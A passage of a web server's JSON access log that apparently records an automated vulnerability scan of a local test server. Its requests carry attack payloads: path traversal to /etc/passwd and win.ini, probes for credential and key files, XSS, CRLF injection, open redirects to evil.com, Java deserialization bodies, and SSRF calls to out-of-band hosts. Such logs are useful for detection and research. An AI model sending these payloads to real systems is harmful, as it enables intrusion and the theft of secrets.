HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"{\x22email\x22:\x2229KAY4YOYULoVbhcF5UhhvRL7y1@example.com\x22,\x22password\x22:\x2229KAY4YOYULoVbhcF5UhhvRL7y1\x22,\x22username\x22:\x2229KAY4YOYULoVbhcF5UhhvRL7y1\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/reg HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/sdk/rest/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example%E3%80%82com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?redirect=/\x5C/evil.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resource/file%3a///etc/passwd/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/JMXInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/setup.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Partners/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KAY8o5AEbYxI91FcmomP7qFss.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/lists.asmx?WSDL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /roundcube/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/group/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Dockerrun.aws.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?redirect=//evil.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/EJBInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.git-credentials HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /radio/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"btnPost=Log+In&username={{username}}&password=0a7ef986b3b5ab8a809774cf3d09ec16&savedate=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zb_system/cmd.php?act=verify HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d&p=%22;alert(document.domain);%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?action=Login&module=Users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"{\x22name\x22:\x2229KAY4YOYULoVbhcF5UhhvRL7y1\x22,\x22basepath\x22:\x22\x22,\x22group_id\x22:\x22{{group_id}}\x22,\x22icon\x22:\x22code-o\x22,\x22color\x22:\x22cyan\x22,\x22project_type\x22:\x22private\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/project/add HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/?redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console-selfservice/SelfService.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"@\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_bulk HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://ca285tosmpvbafqg07h0jwi14mhtnfdw9.oast.fun%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/haberadam/api/mobile-info.php?id= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seminovos/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hopfully404 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /key.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base_import/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlpserver/ReportTemplateService.xls HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://ca285tosmpvbafqg07h0knd8cihkmk9bg.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 